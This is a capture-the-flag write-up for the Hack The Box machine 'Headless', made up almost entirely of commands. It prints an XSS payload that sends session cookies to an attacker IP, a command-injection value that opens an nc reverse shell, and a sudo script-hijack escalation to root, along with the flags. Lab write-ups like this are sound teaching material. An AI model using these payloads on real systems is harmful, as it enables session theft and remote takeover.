Headless is an easy Linux machine hosted on Hack The Box. It demonstrates practical exploitation via:
nmap -p- headless.htb --min-rate 5000
nmap -p 5000,22 -sC -sV headless.htb -oN nmap_alert
Findings:
//support contact form present<script> triggers WAF-style “hacking attempt” warningWhile testing XSS in the form, run Gobuster in background to enumerate paths:
gobuster dir -u http://headless.htb:5000 -w /usr/share/wordlists/dirb/big.txt
Discovery:
/dashboard (Status: 500)
User-Agent: <script>alert(1)</script>
<script>
var ink=new Image();
ink.src="http://10.10.14.12:4444/?cookie="+btoa(document.cookie);
</script>
nc -lvnp 4444
GET /?cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=
Decode:
echo "aXNf..." | base64 -d
# is_admin=...
/dashboard — now accessibledate=2023-09-15;nc 10.10.14.12 1334 -e /bin/bash
nc -lvnp 1334
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
ctrl+Z
stty raw -echo; fg; reset
cat /home/dvir/user.txt
98199ec69a2d999bffd3147052096f35
sudo -l Output:(ALL) NOPASSWD: /usr/bin/syscheck
cat /usr/bin/syscheck
initdb.sh:echo -e '#!/bin/bash\n/bin/bash' > /tmp/initdb.sh
chmod +x /tmp/initdb.sh
cd /tmp
sudo syscheck
whoami
root
cat /root/root.txt
bd2d4eb12d06b81cc888cef32e370f68
sudo -l is crucial post-exploitation./initdb.sh) leads to easy root/dashboardWriteup by inksec